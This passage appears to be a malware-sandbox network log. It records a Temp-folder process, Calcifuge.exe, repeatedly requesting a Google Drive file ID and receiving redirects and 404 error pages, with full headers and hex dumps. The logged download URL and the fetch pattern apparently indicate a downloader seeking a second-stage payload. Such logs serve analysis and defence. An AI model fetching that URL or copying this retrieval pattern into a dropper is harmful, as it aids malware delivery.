                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:52:51 UTC1920INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:52:51 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Content-Security-Policy: script-src 'nonce-YcVFwLTEvQRn3LP0DuVM4Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              19192.168.2.453511172.217.16.1294437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:52:51 UTC470OUTGET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:52:52 UTC1851INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgS65sHIKteAQRJ9OuA9iCRFVPNjinmraY1sYJfxIvygLGfD4ACUn8m9cnAQyZywgqkXtI_VfTI
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:52:52 GMT
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-Lv-tBs9R5wuFPTI0SI8jdA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:52:52 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 68 78 4a 61 71 51 56 49 70 48 61 55 66 69 45 4a 4e 4c 6c 4a 70 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="hxJaqQVIpHaUfiEJNLlJpA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              20192.168.2.453518172.217.16.2064437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:52:53 UTC428OUTGET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:52:53 UTC1920INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:52:53 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-eTaXJPx1ygGd4IXWtvZ8Cg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              21192.168.2.453527172.217.16.1294437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:52:54 UTC470OUTGET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:52:54 UTC1851INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgTrwjeKfxunfcpJKaKrbIAiGW4P1Ljr7ZJ7mQE08XtZhiDlTxy0WkAeWLnpEQgqPgdHx3RnLrM
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:52:54 GMT
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-zhkJkVePQUqbc-5bLKhEFg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:52:54 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 77 66 38 58 4e 55 34 39 4a 62 71 51 74 52 4e 54 76 76 62 6e 2d 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="wf8XNU49JbqQtRNTvvbn-Q">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              22192.168.2.453534172.217.16.2064437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:52:55 UTC428OUTGET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:52:55 UTC1920INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:52:55 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: script-src 'nonce-ihHNSiqNSAElHfq4oLH6Gw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              23192.168.2.453544172.217.16.1294437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:52:56 UTC470OUTGET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:52:56 UTC1851INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgTaVSKliE-r_PVyofyaT3dnLYDHJSjWltWiBw5NU6NOgUV0Cs9ExVEHXHSxv9PUfiUTl04AoOU
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:52:56 GMT
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Security-Policy: script-src 'nonce-ecgEKlSzv5X6Zq2E2r8-ig' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:52:56 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 69 35 73 36 52 65 76 67 35 57 77 49 2d 5f 41 35 38 59 36 6c 6b 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="i5s6Revg5WwI-_A58Y6lkA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              24192.168.2.453551172.217.16.2064437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:52:57 UTC428OUTGET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:52:58 UTC1920INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:52:57 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: script-src 'nonce-0qt7x32aFSZtZDH-WFv-hw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              25192.168.2.453561172.217.16.1294437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:52:58 UTC470OUTGET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:52:59 UTC1851INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgTtRmWoVRiINegPT1bfoYCWxBsFNdGTjoEKLeQodStgP6VJt-YkMw_H-7phXwDvVPP0bJsrDF8
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:52:58 GMT
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-ljTAyChWnrLer8c8jch8Fg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Cross-Origin-Opener-Policy: same-origin
